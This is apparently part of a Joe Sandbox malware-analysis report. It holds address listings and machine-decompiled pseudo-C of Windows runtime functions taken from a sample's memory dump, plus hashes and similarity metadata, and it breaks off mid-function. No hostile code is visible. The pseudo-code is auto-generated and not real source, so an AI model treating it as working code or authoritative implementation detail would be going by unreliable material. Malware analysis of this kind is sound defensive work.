                                                                                                                0x00000000
                                                                                                                0x009c2605
                                                                                                                0x009c260a
                                                                                                                0x009c260c
                                                                                                                0x009c2611
                                                                                                                0x009c2616
                                                                                                                0x009c2619
                                                                                                                0x009c2619
                                                                                                                0x009c261e
                                                                                                                0x00000000
                                                                                                                0x009c2624
                                                                                                                0x009c2627
                                                                                                                0x009c2627
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a05b1f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c2894
                                                                                                                0x009c289b
                                                                                                                0x009c289d
                                                                                                                0x009c28a1
                                                                                                                0x00a05b2b
                                                                                                                0x00a05b2e
                                                                                                                0x00a05b2e
                                                                                                                0x009c28a7
                                                                                                                0x009c28a9
                                                                                                                0x00a05b04
                                                                                                                0x00a05b09
                                                                                                                0x00a05b09
                                                                                                                0x00a05b09
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a05b35
                                                                                                                0x00a05b3c
                                                                                                                0x009c28fb
                                                                                                                0x009c28fb
                                                                                                                0x009c26cc
                                                                                                                0x009c26cc
                                                                                                                0x009c26d0
                                                                                                                0x00000000
                                                                                                                0x009c26d2
                                                                                                                0x009c26d2
                                                                                                                0x00000000
                                                                                                                0x009c26d2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c25fe
                                                                                                                0x009c292d
                                                                                                                0x009c292f
                                                                                                                0x009c2930
                                                                                                                0x009c2935
                                                                                                                0x009c2937
                                                                                                                0x009c2938
                                                                                                                0x009c293b
                                                                                                                0x009c293c
                                                                                                                0x009c293e
                                                                                                                0x009c293f
                                                                                                                0x009c2940
                                                                                                                0x009c2942
                                                                                                                0x009c2944
                                                                                                                0x009c2947
                                                                                                                0x009c2948
                                                                                                                0x009c294e
                                                                                                                0x009c294f
                                                                                                                0x009c2954
                                                                                                                0x009c295a
                                                                                                                0x009c2961
                                                                                                                0x009c2963
                                                                                                                0x009c2964
                                                                                                                0x009c2966
                                                                                                                0x009c296e
                                                                                                                0x009c296f
                                                                                                                0x009c2972
                                                                                                                0x009c2978
                                                                                                                0x009c2980
                                                                                                                0x009c2981
                                                                                                                0x009c2982
                                                                                                                0x009c2983
                                                                                                                0x009c2984
                                                                                                                0x009c2985
                                                                                                                0x009c2986
                                                                                                                0x009c2987
                                                                                                                0x009c2988
                                                                                                                0x009c2989
                                                                                                                0x009c298a
                                                                                                                0x009c298b
                                                                                                                0x009c298c
                                                                                                                0x009c298d
                                                                                                                0x009c298e
                                                                                                                0x009c298f
                                                                                                                0x009c2990
                                                                                                                0x009c2992
                                                                                                                0x009c2997
                                                                                                                0x009c29a3
                                                                                                                0x009c29a6
                                                                                                                0x009c29ab
                                                                                                                0x009c29ad
                                                                                                                0x009c29b0
                                                                                                                0x009c29b2
                                                                                                                0x00a05c80
                                                                                                                0x009c29b8
                                                                                                                0x009c29b8
                                                                                                                0x009c29bb
                                                                                                                0x009c29c0
                                                                                                                0x009c29c5
                                                                                                                0x009c29c6
                                                                                                                0x009c29c6
                                                                                                                0x009c29c9
                                                                                                                0x009c29cb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009c29cd
                                                                                                                0x009c29d0
                                                                                                                0x009c29d9
                                                                                                                0x009c29db
                                                                                                                0x009c29dd
                                                                                                                0x009c2a7f
                                                                                                                0x009c2a84
                                                                                                                0x009c2a87
                                                                                                                0x009c2a89
                                                                                                                0x00a05ca1
                                                                                                                0x00a05ca3
                                                                                                                0x00000000
                                                                                                                0x009c2a8f
                                                                                                                0x009c2a8f
                                                                                                                0x00000000
                                                                                                                0x009c2a8f
                                                                                                                0x00000000
                                                                                                                0x009c29e3
                                                                                                                0x009c29e3
                                                                                                                0x009c29e3
                                                                                                                0x00000000
                                                                                                                0x009c29e3
                                                                                                                0x009c29dd
                                                                                                                0x00000000
                                                                                                                0x009c29db
                                                                                                                0x009c29e6
                                                                                                                0x009c29e9
                                                                                                                0x009c29eb
                                                                                                                0x009c29ed
                                                                                                                0x009c29f3
                                                                                                                0x009c29f5
                                                                                                                0x009c29f8
                                                                                                                0x009c29fa
                                                                                                                0x009c2a97
                                                                                                                0x009c2a9a
                                                                                                                0x009c2a9d
                                                                                                                0x009c2add
                                                                                                                0x00000000
                                                                                                                0x009c2a9f
                                                                                                                0x009c2aa2
                                                                                                                0x009c2aa5
                                                                                                                0x009c2aa8
                                                                                                                0x009c2aab
                                                                                                                0x00a05cab
                                                                                                                0x00a05caf
                                                                                                                0x00a05cc5
                                                                                                                0x00a05cda
                                                                                                                0x00a05cdc
                                                                                                                0x00a05cdf
                                                                                                                0x00a05ce5
                                                                                                                0x00000000
                                                                                                                0x00a05ceb
                                                                                                                0x00a05ced
                                                                                                                0x00a05cee
                                                                                                                0x00000000
                                                                                                                0x00a05cee
                                                                                                                0x00a05cb1
                                                                                                                0x00a05cb4
                                                                                                                0x00a05cb9
                                                                                                                0x00a05cbb
                                                                                                                0x00000000
                                                                                                                0x00a05cbd
                                                                                                                0x00a05cbd
                                                                                                                0x00000000
                                                                                                                0x00a05cbd
                                                                                                                0x00a05cbb
                                                                                                                0x009c2ab1
                                                                                                                0x009c2ab1
                                                                                                                0x009c2ac4
                                                                                                                0x009c2ac6
                                                                                                                0x009c2ac6
                                                                                                                0x00000000
                                                                                                                0x009c2ac6
                                                                                                                0x009c2aab
                                                                                                                0x00000000
                                                                                                                0x009c2a00
                                                                                                                0x009c2a09
                                                                                                                0x009c2a0e
                                                                                                                0x009c2a21
                                                                                                                0x009c2a24
                                                                                                                0x009c2a35
                                                                                                                0x009c2a3a
                                                                                                                0x009c2a3d
                                                                                                                0x009c2a42
                                                                                                                0x009c2a59
                                                                                                                0x009c2a59
                                                                                                                0x009c2a5c
                                                                                                                0x009c2a5f
                                                                                                                0x009c2a5f
                                                                                                                0x009c29fa
                                                                                                                0x009c29f3
                                                                                                                0x009c2a64
                                                                                                                0x009c2a64
                                                                                                                0x009c2a6b
                                                                                                                0x009c2a6b
                                                                                                                0x009c2a6d
                                                                                                                0x009c2a72
                                                                                                                0x009c2a72
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PATH
                                                                                                                • API String ID: 0-1036084923
                                                                                                                • Opcode ID: b0e69d14650fc78d87a6ceccb523c54167a591fc451c4cb64777a889f259572c
                                                                                                                • Instruction ID: 2f44304e192e209a21eefca0ffc3b10921affd2955d319f4d918b243b5b337d9
                                                                                                                • Opcode Fuzzy Hash: b0e69d14650fc78d87a6ceccb523c54167a591fc451c4cb64777a889f259572c
                                                                                                                • Instruction Fuzzy Hash: A8C18E71E00219DBCB24DFA8D981FAEB7B5FF48740F54442EE401BB291EB78A941CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009CFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E009CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E009AEEF0(0xa87b60);
					_t134 =  *0xa87b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xa87b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xa87b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E009A6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E009A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00A38938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0099B150();
													}
													_t116 = E00A36D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E009A75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xa88638; // 0x0
																	_t122 = L009A38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E009A76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E009A76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L009CFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L009A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E009CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E009CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E009CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E009CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E009CFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xa87b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xa87b84 = _t75;
						_t73 = E009AEB70(_t134, 0xa87b60);
						if( *0xa87b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = L009AFF60( *0xa87b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                                0x009cfab0
                                                                                                                0x009cfab2
                                                                                                                0x009cfab3
                                                                                                                0x009cfab4
                                                                                                                0x009cfabc
                                                                                                                0x009cfac0
                                                                                                                0x009cfb14
                                                                                                                0x009cfb17
                                                                                                                0x009cfac2
                                                                                                                0x009cfac8
                                                                                                                0x009cfacd
                                                                                                                0x009cfad3
                                                                                                                0x009cfad3
                                                                                                                0x009cfadd
                                                                                                                0x009cfb18
                                                                                                                0x009cfb1b
                                                                                                                0x009cfb1d
                                                                                                                0x009cfb1e
                                                                                                                0x009cfb1f
                                                                                                                0x009cfb20
                                                                                                                0x009cfb21
                                                                                                                0x009cfb22
                                                                                                                0x009cfb23
                                                                                                                0x009cfb24
                                                                                                                0x009cfb25
                                                                                                                0x009cfb26
                                                                                                                0x009cfb27
                                                                                                                0x009cfb28
                                                                                                                0x009cfb29
                                                                                                                0x009cfb2a
                                                                                                                0x009cfb2b
                                                                                                                0x009cfb2c
                                                                                                                0x009cfb2d
                                                                                                                0x009cfb2e
                                                                                                                0x009cfb2f
                                                                                                                0x009cfb3a
                                                                                                                0x009cfb3b
                                                                                                                0x009cfb3e
                                                                                                                0x009cfb41
                                                                                                                0x009cfb44
                                                                                                                0x009cfb47
                                                                                                                0x009cfb4a
                                                                                                                0x009cfb4d
                                                                                                                0x009cfb53
                                                                                                                0x00a0bdcb
                                                                                                                0x00a0bdcb
                                                                                                                0x009cfb59
                                                                                                                0x009cfb5b
                                                                                                                0x009cfb5b
                                                                                                                0x009cfb5e
                                                                                                                0x00a0bdd5
                                                                                                                0x00a0bdd8
                                                                                                                0x00000000
                                                                                                                0x00a0bdda
                                                                                                                0x00000000
                                                                                                                0x00a0bdda
                                                                                                                0x009cfb64
                                                                                                                0x009cfb64
                                                                                                                0x009cfb64
                                                                                                                0x009cfb67
                                                                                                                0x009cfb6e
                                                                                                                0x009cfb70
                                                                                                                0x009cfb72
                                                                                                                0x00000000
                                                                                                                0x009cfb78
                                                                                                                0x009cfb7a
                                                                                                                0x009cfb7a
                                                                                                                0x009cfb7d
                                                                                                                0x009cfb80
                                                                                                                0x00a0bddf
                                                                                                                0x00a0bde1
                                                                                                                0x00000000
                                                                                                                0x00a0bde3
                                                                                                                0x00000000
                                                                                                                0x00a0bde3
                                                                                                                0x009cfb86
                                                                                                                0x009cfb86
                                                                                                                0x009cfb86
                                                                                                                0x009cfb8b
                                                                                                                0x009cfb90
                                                                                                                0x009cfb92
                                                                                                                0x009cfb94
                                                                                                                0x009cfb9a
                                                                                                                0x009cfb9b
                                                                                                                0x009cfba1
                                                                                                                0x00a0bde8
                                                                                                                0x00a0bdeb
                                                                                                                0x00a0bded
                                                                                                                0x00a0beb5
                                                                                                                0x00a0beb5
                                                                                                                0x00a0bebb
                                                                                                                0x00a0bebd
                                                                                                                0x00a0bec3
                                                                                                                0x00a0bed2
                                                                                                                0x00a0bedd
                                                                                                                0x00a0bedd
                                                                                                                0x00a0beed
                                                                                                                0x00000000
                                                                                                                0x00a0bdf3
                                                                                                                0x00a0bdfe
                                                                                                                0x00a0be06
                                                                                                                0x00a0be0b
                                                                                                                0x00a0be0d
                                                                                                                0x00a0be0f
                                                                                                                0x00a0be14
                                                                                                                0x00a0be19
                                                                                                                0x00a0be20
                                                                                                                0x00a0be25
                                                                                                                0x00a0be27
                                                                                                                0x00a0be35
                                                                                                                0x00a0be39
                                                                                                                0x00a0be46
                                                                                                                0x00a0be4f
                                                                                                                0x00a0be54
                                                                                                                0x00a0be56
                                                                                                                0x00a0bef8
                                                                                                                0x00a0bef8
                                                                                                                0x00000000
                                                                                                                0x00a0be5c
                                                                                                                0x00a0be5c
                                                                                                                0x00a0be60
                                                                                                                0x00000000
                                                                                                                0x00a0be66
                                                                                                                0x00a0be66
                                                                                                                0x00a0be7f
                                                                                                                0x00a0be84
                                                                                                                0x00a0be87
                                                                                                                0x00a0be89
                                                                                                                0x00a0be8b
                                                                                                                0x00a0be99
                                                                                                                0x00a0be9d
                                                                                                                0x00a0bea0
                                                                                                                0x00a0beac
                                                                                                                0x00a0beaf
                                                                                                                0x00a0beb1
                                                                                                                0x00a0beb3
                                                                                                                0x00a0beb3
                                                                                                                0x00000000
                                                                                                                0x00a0bea2
                                                                                                                0x00a0bea2
                                                                                                                0x00000000
                                                                                                                0x00a0bea2
                                                                                                                0x00a0be8d
                                                                                                                0x00a0be8d
                                                                                                                0x00a0be92
                                                                                                                0x00000000
                                                                                                                0x00a0be92
                                                                                                                0x00a0be8b
                                                                                                                0x00a0be60
                                                                                                                0x00a0be3b
                                                                                                                0x00a0be3b
                                                                                                                0x00a0be3e
                                                                                                                0x00000000
                                                                                                                0x00a0be40
                                                                                                                0x00a0be40
                                                                                                                0x00a0be44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a0be44
                                                                                                                0x00a0be3e
                                                                                                                0x00a0be29
                                                                                                                0x00a0be29
                                                                                                                0x00000000
                                                                                                                0x00a0be29
                                                                                                                0x00a0be27
                                                                                                                0x00000000
                                                                                                                0x009cfba7
                                                                                                                0x009cfba7
                                                                                                                0x009cfbab
                                                                                                                0x00a0bf02
                                                                                                                0x009cfbb1
                                                                                                                0x009cfbb1
                                                                                                                0x009cfbb8
                                                                                                                0x009cfbbd
                                                                                                                0x009cfbbd
                                                                                                                0x009cfbbf
                                                                                                                0x009cfbbf
                                                                                                                0x009cfbc5
                                                                                                                0x009cfbcb
                                                                                                                0x009cfbf8
                                                                                                                0x009cfbf8
                                                                                                                0x009cfbfa
                                                                                                                0x00000000
                                                                                                                0x009cfc00
                                                                                                                0x009cfc00
                                                                                                                0x009cfc03
                                                                                                                0x00000000
                                                                                                                0x009cfc09
                                                                                                                0x009cfc09
                                                                                                                0x009cfc0f
                                                                                                                0x009cfc15
                                                                                                                0x009cfc23
                                                                                                                0x009cfc23
                                                                                                                0x009cfc25
                                                                                                                0x009cfc27
                                                                                                                0x009cfc75
                                                                                                                0x009cfc7c
                                                                                                                0x009cfc84
                                                                                                                0x00000000
                                                                                                                0x009cfc29
                                                                                                                0x009cfc29
                                                                                                                0x009cfc2d
                                                                                                                0x009cfc30
                                                                                                                0x00a0bf0f
                                                                                                                0x00000000
                                                                                                                0x009cfc36
                                                                                                                0x009cfc38
                                                                                                                0x009cfc3b
                                                                                                                0x009cfc41
                                                                                                                0x00a0bf17
                                                                                                                0x00a0bf19
                                                                                                                0x00a0bf48
                                                                                                                0x00a0bf4b
                                                                                                                0x00000000
                                                                                                                0x00a0bf1b
                                                                                                                0x00a0bf22
                                                                                                                0x00a0bf24
                                                                                                                0x00a0bf26
                                                                                                                0x00000000
                                                                                                                0x00a0bf2c
                                                                                                                0x00a0bf37
                                                                                                                0x00a0bf39
                                                                                                                0x00a0bf3b
                                                                                                                0x00000000
                                                                                                                0x00a0bf41
                                                                                                                0x00a0bf41
                                                                                                                0x00a0bf41
                                                                                                                0x00a0bf41
                                                                                                                0x00a0bf45
                                                                                                                0x00000000
                                                                                                                0x00a0bf45
                                                                                                                0x00a0bf3b
                                                                                                                0x00a0bf26
                                                                                                                0x00000000
                                                                                                                0x009cfc47
                                                                                                                0x009cfc47
                                                                                                                0x009cfc49
                                                                                                                0x009cfcb2
                                                                                                                0x009cfcb4
                                                                                                                0x009cfcb6
                                                                                                                0x009cfcdc
                                                                                                                0x009cfcdc
                                                                                                                0x00000000
                                                                                                                0x009cfcb8
                                                                                                                0x009cfcc3
                                                                                                                0x009cfcc5
                                                                                                                0x009cfcc7
                                                                                                                0x00000000
                                                                                                                0x009cfcc9
                                                                                                                0x009cfcc9
                                                                                                                0x009cfccd
                                                                                                                0x00000000
                                                                                                                0x009cfccd
                                                                                                                0x009cfcc7
                                                                                                                0x00000000
                                                                                                                0x009cfc4b
                                                                                                                0x009cfc4b
                                                                                                                0x009cfc4e
                                                                                                                0x009cfc4e
                                                                                                                0x009cfc51
                                                                                                                0x009cfc51
                                                                                                                0x009cfc54
                                                                                                                0x009cfc5a
                                                                                                                0x009cfc5c
                                                                                                                0x009cfc5f
                                                                                                                0x009cfc61
                                                                                                                0x009cfc63
                                                                                                                0x009cfc65
                                                                                                                0x009cfc67
                                                                                                                0x009cfc6e
                                                                                                                0x009cfc72
                                                                                                                0x009cfc72
                                                                                                                0x009cfc72
                                                                                                                0x009cfc72
                                                                                                                0x009cfc67
                                                                                                                0x009cfc61
                                                                                                                0x00000000
                                                                                                                0x009cfc5a
                                                                                                                0x009cfc49
                                                                                                                0x009cfc41
                                                                                                                0x009cfc30
                                                                                                                0x009cfc27
                                                                                                                0x009cfc03
                                                                                                                0x009cfbcd
                                                                                                                0x009cfbd3
                                                                                                                0x009cfbd9
                                                                                                                0x009cfbdc
                                                                                                                0x009cfbde
                                                                                                                0x009cfc99
                                                                                                                0x009cfc9b
                                                                                                                0x009cfc9d
                                                                                                                0x009cfcd5
                                                                                                                0x009cfcd5
                                                                                                                0x009cfc89
                                                                                                                0x009cfc89
                                                                                                                0x00000000
                                                                                                                0x009cfc9f
                                                                                                                0x009cfc9f
                                                                                                                0x009cfca3
                                                                                                                0x00000000
                                                                                                                0x009cfca3
                                                                                                                0x00000000
                                                                                                                0x009cfbe4
                                                                                                                0x009cfbe4
                                                                                                                0x009cfbe4
                                                                                                                0x009cfbe4
                                                                                                                0x009cfbe9
                                                                                                                0x009cfbf2
                                                                                                                0x00000000
                                                                                                                0x009cfbf2
                                                                                                                0x009cfbde
                                                                                                                0x009cfbcb
                                                                                                                0x009cfbab
                                                                                                                0x009cfc8b
                                                                                                                0x009cfc8b
                                                                                                                0x009cfc8c
                                                                                                                0x009cfb80
                                                                                                                0x009cfb72
                                                                                                                0x009cfb5e
                                                                                                                0x009cfc8d
                                                                                                                0x009cfc91
                                                                                                                0x009cfadf
                                                                                                                0x009cfadf
                                                                                                                0x009cfae1
                                                                                                                0x009cfae4
                                                                                                                0x009cfae7
                                                                                                                0x009cfaec
                                                                                                                0x009cfaf8
                                                                                                                0x009cfb00
                                                                                                                0x009cfb07
                                                                                                                0x009cfb0f
                                                                                                                0x009cfb0f
                                                                                                                0x009cfb07
                                                                                                                0x00000000
                                                                                                                0x009cfaf8
                                                                                                                0x009cfadd

                                                                                                                Strings
                                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00A0BE0F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                • API String ID: 0-865735534
                                                                                                                • Opcode ID: e4a7569ca03f5d4c3dc264634074e10c416068f995c9aa8f9ad418d7098dd8f7
                                                                                                                • Instruction ID: eddc358b78c8e0dbb2ca3227cf1caaba63c0424e51e5820a9b71df1ddaf3921c
                                                                                                                • Opcode Fuzzy Hash: e4a7569ca03f5d4c3dc264634074e10c416068f995c9aa8f9ad418d7098dd8f7
                                                                                                                • Instruction Fuzzy Hash: 9FA1F271F1060A8BDB25DF68C861BBAB3A6AF49710F14497EE846CB691DB34DC01CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00992D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E00992D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xa85350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xa87bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E009D97C0();
				}
				if( *0xa879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xa879c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
